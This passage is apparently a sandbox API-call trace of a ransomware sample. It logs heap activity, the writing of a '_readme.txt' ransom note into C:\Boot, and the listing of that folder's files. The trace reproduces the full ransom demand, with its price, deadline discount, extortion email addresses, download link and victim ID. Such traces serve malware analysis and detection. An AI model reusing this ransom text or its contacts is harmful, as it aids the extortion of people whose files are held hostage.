(HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.127] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.128] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.128] PathFindFileNameW (pszPath="") returned="" [0174.128] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.128] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.128] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.128] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278d8 | out: hHeap=0x6a0000) returned 1 [0174.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.129] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0174.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278d8 | out: hHeap=0x6a0000) returned 1 [0174.129] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0174.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d2ec90 [0174.129] lstrcpyW (in: lpString1=0x2d2ec90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.130] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.130] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.131] FindFirstFileW (in: lpFileName="C:\\Boot\\*" (normalized: "c:\\boot\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278d8 | out: hHeap=0x6a0000) returned 1 [0174.132] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.132] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xac81ba20, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xac81ba20, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0174.132] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x8f190550, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x6400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0174.132] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9578e980, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0174.132] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9578e980, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0174.132] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9571c560, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0174.132] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0174.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27900 [0174.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27928 [0174.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278d8 | out: hHeap=0x6a0000) returned 1 [0174.133] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0174.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x38) returned 0x2cbfa50 [0174.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27950 [0174.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27928 | out: hHeap=0x6a0000) returned 1 [0174.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27900 | out: hHeap=0x6a0000) returned 1 [0174.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27900 [0174.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0174.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278d8 | out: hHeap=0x6a0000) returned 1 [0174.134] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0174.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x2bf9bd8 [0174.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27928 [0174.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27978 [0174.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27950 | out: hHeap=0x6a0000) returned 1 [0174.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27900 | out: hHeap=0x6a0000) returned 1 [0174.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cbfa50 | out: hHeap=0x6a0000) returned 1 [0174.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27900 [0174.135] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0174.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0174.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27950 [0174.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279a0 [0174.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.135] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa8) returned 0x2c2d920 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27978 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27928 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279f0 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a18 [0174.136] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.136] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfc) returned 0x2c70bc8 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279a0 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27950 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a90 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ab8 [0174.136] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) 